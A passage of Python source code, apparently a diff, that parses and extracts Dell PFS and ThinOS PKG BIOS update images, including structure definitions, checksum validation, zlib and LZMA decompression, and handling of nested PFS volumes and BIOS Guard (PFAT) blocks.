Unknown = f'{int.from_bytes(self.Unknown, "little"):0{len(self.Unknown) * 8}X}' + Version = get_entry_ver(self.Version, self.VersionType) + + printer(['Entry GUID :', GUID], p, False) + printer(['Entry Version :', self.HeaderVersion], p, False) + 
printer(['Payload Version :', Version], p, False) + printer(['Reserved :', f'0x{self.Reserved:X}'], p, False) + printer(['Payload Data Size :', f'0x{self.DataSize:X}'], p, False) + printer(['Payload Signature Size :', f'0x{self.DataSigSize:X}'], p, False) + printer(['Metadata Data Size :', f'0x{self.DataMetSize:X}'], p, False) + printer(['Metadata Signature Size:', f'0x{self.DataMetSigSize:X}'], p, False) + printer(['Unknown :', f'0x{Unknown}'], p, False) + +# Dell PFS Entry Revision 1 Structure +class DellPfsEntryR1(DellPfsEntryBase): + _pack_ = 1 + _fields_ = [ + ('Unknown', uint32_t*4), # 0x38 + # 0x48 (child class, R1) + ] + +# Dell PFS Entry Revision 2 Structure +class DellPfsEntryR2(DellPfsEntryBase): + _pack_ = 1 + _fields_ = [ + ('Unknown', uint32_t*8), # 0x38 + # 0x58 (child class, R2) + ] + +# Dell PFS Information Header Structure +class DellPfsInfo(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('HeaderVersion', uint32_t), # 0x00 + ('GUID', uint32_t*4), # 0x04 Little Endian + # 0x14 + ] + + def struct_print(self, p): + GUID = f'{int.from_bytes(self.GUID, "little"):0{0x10 * 2}X}' + + printer(['Info Version:', self.HeaderVersion], p, False) + printer(['Entry GUID :', GUID], p, False) + +# Dell PFS FileName Header Structure +class DellPfsName(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('Version', uint16_t*4), # 0x00 + ('VersionType', uint8_t*4), # 0x08 + ('CharacterCount', uint16_t), # 0x0C UTF-16 2-byte Characters + # 0x0E + ] + + def struct_print(self, p, name): + Version = get_entry_ver(self.Version, self.VersionType) + + printer(['Payload Version:', Version], p, False) + printer(['Character Count:', self.CharacterCount], p, False) + printer(['Payload Name :', name], p, False) + +# Dell PFS Metadata Header Structure +class DellPfsMetadata(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('ModelIDs', char*501), # 0x000 + ('FileName', char*100), # 0x1F5 + ('FileVersion', char*33), # 0x259 + ('Date', char*33), # 0x27A + ('Brand', char*80), # 0x29B + ('ModelFile', char*80), # 0x2EB + ('ModelName', char*100), # 0x33B + ('ModelVersion', char*33), # 0x39F + # 0x3C0 + ] + + def struct_print(self, p): + printer(['Model IDs :', self.ModelIDs.decode('utf-8').strip(',END')], p, False) + printer(['File Name :', self.FileName.decode('utf-8')], p, False) + printer(['File Version :', self.FileVersion.decode('utf-8')], p, False) + printer(['Date :', self.Date.decode('utf-8')], p, False) + printer(['Brand :', self.Brand.decode('utf-8')], p, False) + printer(['Model File :', self.ModelFile.decode('utf-8')], p, False) + printer(['Model Name :', self.ModelName.decode('utf-8')], p, False) + printer(['Model Version:', self.ModelVersion.decode('utf-8')], p, False) + +# Dell PFS BIOS Guard Metadata Structure +class DellPfsPfatMetadata(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('Address', uint32_t), # 0x00 + ('Unknown0', uint32_t), # 0x04 + ('Offset', uint32_t), # 0x08 Matches BG Script > I0 + ('DataSize', uint32_t), # 0x0C Matches BG Script > I2 & Header > Data Size + ('Unknown1', uint32_t), # 0x10 + ('Unknown2', uint32_t), # 0x14 + ('Unknown3', uint8_t), # 0x18 + # 0x19 + ] + + def struct_print(self, p): + printer(['Address :', f'0x{self.Address:X}'], p, False) + printer(['Unknown 0:', f'0x{self.Unknown0:X}'], p, False) + printer(['Offset :', f'0x{self.Offset:X}'], p, False) + printer(['Length :', f'0x{self.DataSize:X}'], p, False) + printer(['Unknown 1:', f'0x{self.Unknown1:X}'], p, False) + printer(['Unknown 2:', f'0x{self.Unknown2:X}'], 
p, False) + printer(['Unknown 3:', f'0x{self.Unknown3:X}'], p, False) + +# The Dell ThinOS PKG update images usually contain multiple sections. +# Each section starts with a 0x30 header, which begins with pattern 72135500. +# The section length is found at 0x10-0x14 and its (optional) MD5 hash at 0x20-0x30. +# Section data can be raw or LZMA2 (7zXZ) compressed. The latter contains the PFS update image. +def is_pfs_pkg(input_file): + input_buffer = file_to_bytes(input_file) + + return PAT_DELL_PKG.search(input_buffer) + +# The Dell PFS update images usually contain multiple sections. +# Each section is zlib-compressed with header pattern ********++EEAA761BECBB20F1E651--789C, +# where ******** is the zlib stream size, ++ is the section type and -- the header Checksum XOR 8. +# The "Firmware" section has type AA and its files are stored in PFS format. +# The "Utility" section has type BB and its files are stored in PFS, BIN or 7z formats. +def is_pfs_hdr(input_file): + input_buffer = file_to_bytes(input_file) + + return bool(PAT_DELL_HDR.search(input_buffer)) + +# Each section is followed by the footer pattern ********EEAAEE8F491BE8AE143790--, +# where ******** is the zlib stream size and ++ the footer Checksum XOR 8. +def is_pfs_ftr(input_file): + input_buffer = file_to_bytes(input_file) + + return bool(PAT_DELL_FTR.search(input_buffer)) + +# Check if input is Dell PFS/PKG image +def is_dell_pfs(input_file): + input_buffer = file_to_bytes(input_file) + + is_pkg = is_pfs_pkg(input_buffer) + + is_hdr = is_pfs_hdr(input_buffer) + + is_ftr = is_pfs_ftr(input_buffer) + + return bool(is_pkg or is_hdr and is_ftr) + +# Parse & Extract Dell PFS Update image +def pfs_pkg_parse(input_file, extract_path, padding=0, structure=True, advanced=True): + input_buffer = file_to_bytes(input_file) + + make_dirs(extract_path, delete=True) + + is_dell_pkg = is_pfs_pkg(input_buffer) + + if is_dell_pkg: + pfs_results = thinos_pkg_extract(input_buffer, extract_path) + else: + pfs_results = {path_stem(input_file) if os.path.isfile(input_file) else 'Image': input_buffer} + + # Parse each Dell PFS image contained in the input file + for pfs_index,(pfs_name,pfs_buffer) in enumerate(pfs_results.items(), start=1): + # At ThinOS PKG packages, multiple PFS images may be included in separate model-named folders + pfs_path = os.path.join(extract_path, f'{pfs_index} {pfs_name}') if is_dell_pkg else extract_path + # Parse each PFS ZLIB section + for zlib_offset in get_section_offsets(pfs_buffer): + # Call the PFS ZLIB section parser function + pfs_section_parse(pfs_buffer, zlib_offset, pfs_path, pfs_name, pfs_index, 1, False, padding, structure, advanced) + +# Extract Dell ThinOS PKG 7zXZ +def thinos_pkg_extract(input_file, extract_path): + input_buffer = file_to_bytes(input_file) + + # Initialize PFS results (Name: Buffer) + pfs_results = {} + + # Search input image for ThinOS PKG 7zXZ header + thinos_pkg_match = PAT_DELL_PKG.search(input_buffer) + + lzma_len_off = thinos_pkg_match.start() + 0x10 + lzma_len_int = int.from_bytes(input_buffer[lzma_len_off:lzma_len_off + 0x4], 'little') + lzma_bin_off = thinos_pkg_match.end() - 0x5 + lzma_bin_dat = input_buffer[lzma_bin_off:lzma_bin_off + lzma_len_int] + + # Check if the compressed 7zXZ stream is complete + if len(lzma_bin_dat) != lzma_len_int: + return pfs_results + + working_path = os.path.join(extract_path, 'THINOS_PKG_TEMP') + + make_dirs(working_path, delete=True) + + pkg_tar_path = os.path.join(working_path, 'THINOS_PKG.TAR') + + with open(pkg_tar_path, 'wb') as pkg_payload: 
+ pkg_payload.write(lzma.decompress(lzma_bin_dat)) + + if is_szip_supported(pkg_tar_path, 0, args=['-tTAR'], check=True, silent=True): + if szip_decompress(pkg_tar_path, working_path, 'TAR', 0, args=['-tTAR'], check=True, silent=True) == 0: + os.remove(pkg_tar_path) + else: + return pfs_results + else: + return pfs_results + + for pkg_file in get_path_files(working_path): + if is_pfs_hdr(pkg_file): + pfs_name = path_name(path_parent(pkg_file)) + pfs_results.update({pfs_name: file_to_bytes(pkg_file)}) + + del_dirs(working_path) + + return pfs_results + +# Get PFS ZLIB Section Offsets +def get_section_offsets(buffer): + pfs_zlib_list = [] # Initialize PFS ZLIB offset list + + pfs_zlib_init = list(PAT_DELL_HDR.finditer(buffer)) + + if not pfs_zlib_init: + return pfs_zlib_list # No PFS ZLIB detected + + # Remove duplicate/nested PFS ZLIB offsets + for zlib_c in pfs_zlib_init: + is_duplicate = False # Initialize duplicate/nested PFS ZLIB offset + + for zlib_o in pfs_zlib_init: + zlib_o_size = int.from_bytes(buffer[zlib_o.start() - 0x5:zlib_o.start() - 0x1], 'little') + + # If current PFS ZLIB offset is within another PFS ZLIB range (start-end), set as duplicate + if zlib_o.start() < zlib_c.start() < zlib_o.start() + zlib_o_size: + is_duplicate = True + + if not is_duplicate: + pfs_zlib_list.append(zlib_c.start()) + + return pfs_zlib_list + +# Dell PFS ZLIB Section Parser +def pfs_section_parse(zlib_data, zlib_start, extract_path, pfs_name, pfs_index, pfs_count, is_rec, padding=0, structure=True, advanced=True): + is_zlib_error = False # Initialize PFS ZLIB-related error state + + section_type = zlib_data[zlib_start - 0x1] # Byte before PFS ZLIB Section pattern is Section Type (e.g. AA, BB) + section_name = {0xAA:'Firmware', 0xBB:'Utilities'}.get(section_type, f'Unknown ({section_type:02X})') + + # Show extraction complete message for each main PFS ZLIB Section + printer(f'Extracting Dell PFS {pfs_index} > {pfs_name} > {section_name}', padding) + + # Set PFS ZLIB Section extraction sub-directory path + section_path = os.path.join(extract_path, safe_name(section_name)) + + # Create extraction sub-directory and delete old (if present, not in recursions) + make_dirs(section_path, delete=(not is_rec), parents=True, exist_ok=True) + + # Store the compressed zlib stream start offset + compressed_start = zlib_start + 0xB + + # Store the PFS ZLIB section header start offset + header_start = zlib_start - 0x5 + + # Store the PFS ZLIB section header contents (16 bytes) + header_data = zlib_data[header_start:compressed_start] + + # Check if the PFS ZLIB section header Checksum XOR 8 is valid + if get_chk_8_xor(header_data[:0xF]) != header_data[0xF]: + printer('Error: Invalid Dell PFS ZLIB section Header Checksum!', padding) + is_zlib_error = True + + # Store the compressed zlib stream size from the header contents + compressed_size_hdr = int.from_bytes(header_data[:0x4], 'little') + + # Store the compressed zlib stream end offset + compressed_end = compressed_start + compressed_size_hdr + + # Store the compressed zlib stream contents + compressed_data = zlib_data[compressed_start:compressed_end] + + # Check if the compressed zlib stream is complete, based on header + if len(compressed_data) != compressed_size_hdr: + printer('Error: Incomplete Dell PFS ZLIB section data (Header)!', padding) + is_zlib_error = True + + # Store the PFS ZLIB section footer contents (16 bytes) + footer_data = zlib_data[compressed_end:compressed_end + 0x10] + + # Check if PFS ZLIB section footer was found in the section + if not 
is_pfs_ftr(footer_data): + printer('Error: This Dell PFS ZLIB section is corrupted!', padding) + is_zlib_error = True + + # Check if the PFS ZLIB section footer Checksum XOR 8 is valid + if get_chk_8_xor(footer_data[:0xF]) != footer_data[0xF]: + printer('Error: Invalid Dell PFS ZLIB section Footer Checksum!', padding) + is_zlib_error = True + + # Store the compressed zlib stream size from the footer contents + compressed_size_ftr = int.from_bytes(footer_data[:0x4], 'little') + + # Check if the compressed zlib stream is complete, based on footer + if compressed_size_ftr != compressed_size_hdr: + printer('Error: Incomplete Dell PFS ZLIB section data (Footer)!', padding) + is_zlib_error = True + + # Decompress PFS ZLIB section payload + try: + if is_zlib_error: + raise Exception('ZLIB_ERROR') # ZLIB errors are critical + section_data = zlib.decompress(compressed_data) # ZLIB decompression + except Exception: + section_data = zlib_data # Fallback to raw ZLIB data upon critical error + + # Call the PFS Extract function on the decompressed PFS ZLIB Section + pfs_extract(section_data, pfs_index, pfs_name, pfs_count, section_path, padding, structure, advanced) + +# Parse & Extract Dell PFS Volume +def pfs_extract(buffer, pfs_index, pfs_name, pfs_count, extract_path, padding=0, structure=True, advanced=True): + # Show PFS Volume indicator + if structure: + printer('PFS Volume:', padding) + + # Get PFS Header Structure values + pfs_hdr = get_struct(buffer, 0, DellPfsHeader) + + # Validate that a PFS Header was parsed + if pfs_hdr.Tag != b'PFS.HDR.': + printer('Error: PFS Header could not be found!', padding + 4) + + return # Critical error, abort + + # Show PFS Header Structure info + if structure: + printer('PFS Header:\n', padding + 4) + pfs_hdr.struct_print(padding + 8) + + # Validate that a known PFS Header Version was encountered + chk_hdr_ver(pfs_hdr.HeaderVersion, 'PFS', padding + 8) + + # Get PFS Payload Data + pfs_payload = buffer[PFS_HEAD_LEN:PFS_HEAD_LEN + pfs_hdr.PayloadSize] + + # Parse all PFS Payload Entries/Components + entry_index = 1 # Index number of each PFS Entry + entry_start = 0 # Increasing PFS Entry starting offset + entries_all = [] # Storage for each PFS Entry details + filename_info = [] # Buffer for FileName Information Entry Data + signature_info = [] # Buffer for Signature Information Entry Data + pfs_entry_struct,pfs_entry_size = get_pfs_entry(pfs_payload, entry_start) # Get PFS Entry Info + while len(pfs_payload[entry_start:entry_start + pfs_entry_size]) == pfs_entry_size: + # Analyze PFS Entry Structure and get relevant info + _,entry_version,entry_guid,entry_data,entry_data_sig,entry_met,entry_met_sig,next_entry = \ + parse_pfs_entry(pfs_payload, entry_start, pfs_entry_size, pfs_entry_struct, 'PFS Entry', padding, structure) + + entry_type = 'OTHER' # Adjusted later if PFS Entry is Zlib, PFAT, PFS Info, Model Info + + # Get PFS Information from the PFS Entry with GUID E0717CE3A9BB25824B9F0DC8FD041960 or B033CB16EC9B45A14055F80E4D583FD3 + if entry_guid in ['E0717CE3A9BB25824B9F0DC8FD041960','B033CB16EC9B45A14055F80E4D583FD3']: + filename_info = entry_data + entry_type = 'NAME_INFO' + + # Get Model Information from the PFS Entry with GUID 6F1D619A22A6CB924FD4DA68233AE3FB + elif entry_guid == '6F1D619A22A6CB924FD4DA68233AE3FB': + entry_type = 'MODEL_INFO' + + # Get Signature Information from the PFS Entry with GUID D086AFEE3ADBAEA94D5CED583C880BB7 + elif entry_guid == 'D086AFEE3ADBAEA94D5CED583C880BB7': + signature_info = entry_data + entry_type = 'SIG_INFO' + + # Get 
Nested PFS from the PFS Entry with GUID 900FAE60437F3AB14055F456AC9FDA84 + elif entry_guid == '900FAE60437F3AB14055F456AC9FDA84': + entry_type = 'NESTED_PFS' # Nested PFS are usually zlib-compressed so it might change to 'ZLIB' later + + # Store all relevant PFS Entry details + entries_all.append([entry_index, entry_guid, entry_version, entry_type, entry_data, entry_data_sig, entry_met, entry_met_sig]) + + entry_index += 1 # Increase PFS Entry Index number for user-friendly output and name duplicates + entry_start = next_entry # Next PFS Entry starts after PFS Entry Metadata Signature + + # Parse all PFS Information Entries/Descriptors + info_start = 0 # Increasing PFS Information Entry starting offset + info_all = [] # Storage for each PFS Information Entry details + while len(filename_info[info_start:info_start + PFS_INFO_LEN]) == PFS_INFO_LEN: + # Get PFS Information Header Structure info + entry_info_hdr = get_struct(filename_info, info_start, DellPfsInfo) + + # Show PFS Information Header Structure info + if structure: + printer('PFS Information Header:\n', padding + 4) + entry_info_hdr.struct_print(padding + 8) + + # Validate that a known PFS Information Header Version was encountered + if entry_info_hdr.HeaderVersion != 1: + printer(f'Error: Unknown PFS Information Header Version {entry_info_hdr.HeaderVersion}!', padding + 8) + break # Skip PFS Information Entries/Descriptors in case of unknown PFS Information Header Version + + # Get PFS Information Header GUID in Big Endian format to match each Info to the equivalent stored PFS Entry details + entry_guid = f'{int.from_bytes(entry_info_hdr.GUID, "little"):0{0x10 * 2}X}' + + # Get PFS FileName Structure values + entry_info_mod = get_struct(filename_info, info_start + PFS_INFO_LEN, DellPfsName) + + # The PFS FileName Structure is not complete by itself. The size of the last field (Entry Name) is determined from + # CharacterCount multiplied by 2 due to usage of UTF-16 2-byte Characters. 
Any Entry Name leading and/or trailing + # space/null characters are stripped and common Windows reserved/illegal filename characters are replaced + name_start = info_start + PFS_INFO_LEN + PFS_NAME_LEN # PFS Entry's FileName start offset + name_size = entry_info_mod.CharacterCount * 2 # PFS Entry's FileName buffer total size + name_data = filename_info[name_start:name_start + name_size] # PFS Entry's FileName buffer + entry_name = safe_name(name_data.decode('utf-16').strip()) # PFS Entry's FileName value + + # Show PFS FileName Structure info + if structure: + printer('PFS FileName Entry:\n', padding + 8) + entry_info_mod.struct_print(padding + 12, entry_name) + + # Get PFS FileName Version string via "Version" and "VersionType" fields + # PFS FileName Version string must be preferred over PFS Entry's Version + entry_version = get_entry_ver(entry_info_mod.Version, entry_info_mod.VersionType) + + # Store all relevant PFS FileName details + info_all.append([entry_guid, entry_name, entry_version]) + + # The next PFS Information Header starts after the calculated FileName size + # Two space/null characters seem to always exist after each FileName value + info_start += (PFS_INFO_LEN + PFS_NAME_LEN + name_size + 0x2) + + # Parse Nested PFS Metadata when its PFS Information Entry is missing + for index in range(len(entries_all)): + if entries_all[index][3] == 'NESTED_PFS' and not filename_info: + entry_guid = entries_all[index][1] # Nested PFS Entry GUID in Big Endian format + entry_metadata = entries_all[index][6] # Use Metadata as PFS Information Entry + + # When PFS Information Entry exists, Nested PFS Metadata contains only Model IDs + # When it's missing, the Metadata structure is large and contains equivalent info + if len(entry_metadata) >= PFS_META_LEN: + # Get Nested PFS Metadata Structure values + entry_info = get_struct(entry_metadata, 0, DellPfsMetadata) + + # Show Nested PFS Metadata Structure info + if structure: + printer('PFS Metadata Information:\n', padding + 4) + entry_info.struct_print(padding + 8) + + # As Nested PFS Entry Name, we'll use the actual PFS File Name + # Replace common Windows reserved/illegal filename characters + entry_name = safe_name(entry_info.FileName.decode('utf-8').strip('.exe')) + + # As Nested PFS Entry Version, we'll use the actual PFS File Version + entry_version = entry_info.FileVersion.decode('utf-8') + + # Store all relevant Nested PFS Metadata/Information details + info_all.append([entry_guid, entry_name, entry_version]) + + # Re-set Nested PFS Entry Version from Metadata + entries_all[index][2] = entry_version + + # Parse all PFS Signature Entries/Descriptors + sign_start = 0 # Increasing PFS Signature Entry starting offset + while len(signature_info[sign_start:sign_start + PFS_INFO_LEN]) == PFS_INFO_LEN: + # Get PFS Information Header Structure info + entry_info_hdr = get_struct(signature_info, sign_start, DellPfsInfo) + + # Show PFS Information Header Structure info + if structure: + printer('PFS Information Header:\n', padding + 4) + entry_info_hdr.struct_print(padding + 8) + + # Validate that a known PFS Information Header Version was encountered + if entry_info_hdr.HeaderVersion != 1: + printer(f'Error: Unknown PFS Information Header Version {entry_info_hdr.HeaderVersion}!', padding + 8) + break # Skip PFS Signature Entries/Descriptors in case of unknown Header Version + + # PFS Signature Entries/Descriptors have DellPfsInfo + DellPfsEntryR* + Sign Size [0x2] + Sign Data [Sig Size] + pfs_entry_struct, pfs_entry_size = 
get_pfs_entry(signature_info, sign_start + PFS_INFO_LEN) # Get PFS Entry Info + + # Get PFS Entry Header Structure info + entry_hdr = get_struct(signature_info, sign_start + PFS_INFO_LEN, pfs_entry_struct) + + # Show PFS Information Header Structure info + if structure: + printer('PFS Information Entry:\n', padding + 8) + entry_hdr.struct_print(padding + 12) + + # Show PFS Signature Size & Data (after DellPfsEntryR*) + sign_info_start = sign_start + PFS_INFO_LEN + pfs_entry_size + sign_size = int.from_bytes(signature_info[sign_info_start:sign_info_start + 0x2], 'little') + sign_data_raw = signature_info[sign_info_start + 0x2:sign_info_start + 0x2 + sign_size] + sign_data_txt = f'{int.from_bytes(sign_data_raw, "little"):0{sign_size * 2}X}' + + if structure: + printer('Signature Information:\n', padding + 8) + printer(f'Signature Size: 0x{sign_size:X}', padding + 12, False) + printer(f'Signature Data: {sign_data_txt[:32]} [...]', padding + 12, False) + + # The next PFS Signature Entry/Descriptor starts after the previous Signature Data + sign_start += (PFS_INFO_LEN + pfs_entry_size + 0x2 + sign_size) + + # Parse each PFS Entry Data for special types (zlib or PFAT) + for index in range(len(entries_all)): + entry_data = entries_all[index][4] # Get PFS Entry Data + entry_type = entries_all[index][3] # Get PFS Entry Type + + # Very small PFS Entry Data cannot be of special type + if len(entry_data) < PFS_HEAD_LEN: + continue + + # Check if PFS Entry contains zlib-compressed sub-PFS Volume + pfs_zlib_offsets = get_section_offsets(entry_data) + + # Check if PFS Entry contains sub-PFS Volume with PFAT Payload + is_pfat = False # Initial PFAT state for sub-PFS Entry + _, pfat_entry_size = get_pfs_entry(entry_data, PFS_HEAD_LEN) # Get possible PFS PFAT Entry Size + pfat_hdr_off = PFS_HEAD_LEN + pfat_entry_size # Possible PFAT Header starts after PFS Header & Entry + pfat_entry_hdr = get_struct(entry_data, 0, DellPfsHeader) # Possible PFS PFAT Entry + if len(entry_data) - pfat_hdr_off >= PFAT_HDR_LEN: + pfat_hdr = get_struct(entry_data, pfat_hdr_off, IntelBiosGuardHeader) + is_pfat = pfat_hdr.get_platform_id().upper().startswith('DELL') + + # Parse PFS Entry which contains sub-PFS Volume with PFAT Payload + if pfat_entry_hdr.Tag == b'PFS.HDR.' and is_pfat: + entry_type = 'PFAT' # Re-set PFS Entry Type from OTHER to PFAT, to use such info afterwards + + entry_data = parse_pfat_pfs(pfat_entry_hdr, entry_data, padding, structure) # Parse sub-PFS PFAT Volume + + # Parse PFS Entry which contains zlib-compressed sub-PFS Volume + elif pfs_zlib_offsets: + entry_type = 'ZLIB' # Re-set PFS Entry Type from OTHER to ZLIB, to use such info afterwards + pfs_count += 1 # Increase the count/index of parsed main PFS structures by one + + # Parse each sub-PFS ZLIB Section + for offset in pfs_zlib_offsets: + # Get the Name of the zlib-compressed full PFS structure via the already stored PFS Information + # The zlib-compressed full PFS structure(s) are used to contain multiple FW (CombineBiosNameX) + # When zlib-compressed full PFS structure(s) exist within the main/first full PFS structure, + # its PFS Information should contain their names (CombineBiosNameX). 
Since the main/first + # full PFS structure has count/index 1, the rest start at 2+ and thus, their PFS Information + # names can be retrieved in order by subtracting 2 from the main/first PFS Information values + sub_pfs_name = f'{info_all[pfs_count - 2][1]} v{info_all[pfs_count - 2][2]}' if info_all else ' UNKNOWN' + + # Set the sub-PFS output path (create sub-folders for each sub-PFS and its ZLIB sections) + sub_pfs_path = os.path.join(extract_path, f'{pfs_count} {safe_name(sub_pfs_name)}') + + # Recursively call the PFS ZLIB Section Parser function for the sub-PFS Volume (pfs_index = pfs_count) + pfs_section_parse(entry_data, offset, sub_pfs_path, sub_pfs_name, pfs_count, pfs_count, True, padding + 4, structure, advanced) + + entries_all[index][4] = entry_data # Adjust PFS Entry Data after parsing PFAT (same ZLIB raw data, not stored afterwards) + entries_all[index][3] = entry_type # Adjust PFS Entry Type from OTHER to PFAT or ZLIB (ZLIB is ignored at file extraction) + + # Name & Store each PFS Entry/Component Data, Data Signature, Metadata, Metadata Signature + for entry_index in range(len(entries_all)): + file_index = entries_all[entry_index][0] + file_guid = entries_all[entry_index][1] + file_version = entries_all[entry_index][2] + file_type = entries_all[entry_index][3] + file_data = entries_all[entry_index][4] + file_data_sig = entries_all[entry_index][5] + file_meta = entries_all[entry_index][6] + file_meta_sig = entries_all[entry_index][7] + + # Give Names to special PFS Entries, not covered by PFS Information + if file_type == 'MODEL_INFO': + file_name = 'Model Information' + elif file_type == 'NAME_INFO': + file_name = 'Filename Information' + if not advanced: + continue # Don't store Filename Information in non-advanced user mode + elif file_type == 'SIG_INFO': + file_name = 'Signature Information' + if not advanced: + continue # Don't store Signature Information in non-advanced user mode + else: + file_name = '' + + # Most PFS Entry Names & Versions are found at PFS Information via their GUID + # Version can be found at DellPfsEntryR* but prefer PFS Information when possible + for info_index in range(len(info_all)): + info_guid = info_all[info_index][0] + info_name = info_all[info_index][1] + info_version = info_all[info_index][2] + + # Give proper Name & Version info if Entry/Information GUIDs match + if info_guid == file_guid: + file_name = info_name + file_version = info_version + + info_all[info_index][0] = 'USED' # PFS with zlib-compressed sub-PFS use the same GUID + + break # Break at 1st Name match to not rename again from next zlib-compressed sub-PFS with the same GUID + + # For both advanced & non-advanced users, the goal is to store final/usable files only + # so empty or intermediate files such as sub-PFS, PFS w/ PFAT or zlib-PFS are skipped + # Main/First PFS CombineBiosNameX Metadata files must be kept for accurate Model Information + # All users should check these files in order to choose the correct CombineBiosNameX modules + write_files = [] # Initialize list of output PFS Entry files to be written/extracted + + is_zlib = bool(file_type == 'ZLIB') # Determine if PFS Entry Data was zlib-compressed + + if file_data and not is_zlib: + write_files.append([file_data, 'data']) # PFS Entry Data Payload + + if file_data_sig and advanced: + write_files.append([file_data_sig, 'sign_data']) # PFS Entry Data Signature + + if file_meta and (is_zlib or advanced): + write_files.append([file_meta, 'meta']) # PFS Entry Metadata Payload + + if file_meta_sig and advanced: + 
write_files.append([file_meta_sig, 'sign_meta']) # PFS Entry Metadata Signature + + # Write/Extract PFS Entry files + for file in write_files: + full_name = f'{pfs_index} {pfs_name} -- {file_index} {file_name} v{file_version}' # Full PFS Entry Name + pfs_file_write(file[0], file[1], file_type, full_name, extract_path, padding, structure, advanced) + + # Get PFS Footer Data after PFS Header Payload + pfs_footer = buffer[PFS_HEAD_LEN + pfs_hdr.PayloadSize:PFS_HEAD_LEN + pfs_hdr.PayloadSize + PFS_FOOT_LEN] + + # Analyze PFS Footer Structure + chk_pfs_ftr(pfs_footer, pfs_payload, pfs_hdr.PayloadSize, 'PFS', padding, structure) + +# Analyze Dell PFS Entry Structure +def parse_pfs_entry(entry_buffer, entry_start, entry_size, entry_struct, text, padding=0, structure=True): + # Get PFS Entry Structure values + pfs_entry = get_struct(entry_buffer, entry_start, entry_struct) + + # Show PFS Entry Structure info + if structure: + printer('PFS Entry:\n', padding + 4) + pfs_entry.struct_print(padding + 8) + + # Validate that a known PFS Entry Header Version was encountered + chk_hdr_ver(pfs_entry.HeaderVersion, text, padding + 8) + + # Validate that the PFS Entry Reserved field is empty + if pfs_entry.Reserved != 0: + printer(f'Error: Detected non-empty {text} Reserved field!', padding + 8) + + # Get PFS Entry Version string via "Version" and "VersionType" fields + entry_version = get_entry_ver(pfs_entry.Version, pfs_entry.VersionType) + + # Get PFS Entry GUID in Big Endian format + entry_guid = f'{int.from_bytes(pfs_entry.GUID, "little"):0{0x10 * 2}X}' + + # PFS Entry Data starts after the PFS Entry Structure + entry_data_start = entry_start + entry_size + entry_data_end = entry_data_start + pfs_entry.DataSize + + # PFS Entry Data Signature starts after PFS Entry Data + entry_data_sig_start = entry_data_end + entry_data_sig_end = entry_data_sig_start + pfs_entry.DataSigSize + + # PFS Entry Metadata starts after PFS Entry Data Signature + entry_met_start = entry_data_sig_end + entry_met_end = entry_met_start + pfs_entry.DataMetSize + + # PFS Entry Metadata Signature starts after PFS Entry Metadata + entry_met_sig_start = entry_met_end + entry_met_sig_end = entry_met_sig_start + pfs_entry.DataMetSigSize + + entry_data = entry_buffer[entry_data_start:entry_data_end] # Store PFS Entry Data + entry_data_sig = entry_buffer[entry_data_sig_start:entry_data_sig_end] # Store PFS Entry Data Signature + entry_met = entry_buffer[entry_met_start:entry_met_end] # Store PFS Entry Metadata + entry_met_sig = entry_buffer[entry_met_sig_start:entry_met_sig_end] # Store PFS Entry Metadata Signature + + return pfs_entry, entry_version, entry_guid, entry_data, entry_data_sig, entry_met, entry_met_sig, entry_met_sig_end + +# Parse Dell PFS Volume with PFAT Payload +def parse_pfat_pfs(entry_hdr, entry_data, padding=0, structure=True): + # Show PFS Volume indicator + if structure: + printer('PFS Volume:', padding + 4) + + # Show sub-PFS Header Structure Info + if structure: + printer('PFS Header:\n', padding + 8) + entry_hdr.struct_print(padding + 12) + + # Validate that a known sub-PFS Header Version was encountered + chk_hdr_ver(entry_hdr.HeaderVersion, 'sub-PFS', padding + 12) + + # Get sub-PFS Payload Data + pfat_payload = entry_data[PFS_HEAD_LEN:PFS_HEAD_LEN + entry_hdr.PayloadSize] + + # Get sub-PFS Footer Data after sub-PFS Header Payload (must be retrieved at the initial entry_data, before PFAT parsing) + pfat_footer = entry_data[PFS_HEAD_LEN + entry_hdr.PayloadSize:PFS_HEAD_LEN + entry_hdr.PayloadSize + PFS_FOOT_LEN] + 
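# --- Illustrative aside (not part of the upstream biosutilities code) ---
# The loop below walks every sub-PFS PFAT Entry, reads the payload Offset and
# Length encoded by the BIOS Guard script opcodes (script bytes 0xC-0x10 and
# 0x1C-0x20), and finally reassembles the sorted payloads, padding any gaps
# with 0xFF. A compact sketch of that reassembly idea, assuming non-overlapping
# blocks given as (offset_in_final_image, raw_data) tuples:

def rebuild_pfat_image_sketch(blocks):
    image = b''
    for offset, data in sorted(blocks):
        image += b'\xFF' * (offset - len(image))  # fill any gap with 0xFF, as the code below does
        image += data
    return image

# e.g. rebuild_pfat_image_sketch([(0x20, b'B' * 8), (0x0, b'A' * 16)]) yields
# 16 x 'A', then 16 bytes of 0xFF padding, then 8 x 'B'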
+ # Parse all sub-PFS Payload PFAT Entries + pfat_entries_all = [] # Storage for all sub-PFS PFAT Entries Order/Offset & Payload/Raw Data + pfat_entry_start = 0 # Increasing sub-PFS PFAT Entry start offset + pfat_entry_index = 1 # Increasing sub-PFS PFAT Entry count index + _, pfs_entry_size = get_pfs_entry(pfat_payload, 0) # Get initial PFS PFAT Entry Size for loop + while len(pfat_payload[pfat_entry_start:pfat_entry_start + pfs_entry_size]) == pfs_entry_size: + # Get sub-PFS PFAT Entry Structure & Size info + pfat_entry_struct,pfat_entry_size = get_pfs_entry(pfat_payload, pfat_entry_start) + + # Analyze sub-PFS PFAT Entry Structure and get relevant info + pfat_entry,_,_,pfat_entry_data,_,pfat_entry_met,_,pfat_next_entry = parse_pfs_entry(pfat_payload, + pfat_entry_start, pfat_entry_size, pfat_entry_struct, 'sub-PFS PFAT Entry', padding + 4, structure) + + # Each sub-PFS PFAT Entry includes an AMI BIOS Guard (a.k.a. PFAT) block at the beginning + # We need to parse the PFAT block and remove its contents from the final Payload/Raw Data + pfat_hdr_off = pfat_entry_start + pfat_entry_size # PFAT block starts after PFS Entry + + # Get sub-PFS PFAT Header Structure values + pfat_hdr = get_struct(pfat_payload, pfat_hdr_off, IntelBiosGuardHeader) + + # Get ordinal value of the sub-PFS PFAT Entry Index + pfat_entry_idx_ord = get_ordinal(pfat_entry_index) + + # Show sub-PFS PFAT Header Structure info + if structure: + printer(f'PFAT Block {pfat_entry_idx_ord} - Header:\n', padding + 12) + pfat_hdr.struct_print(padding + 16) + + 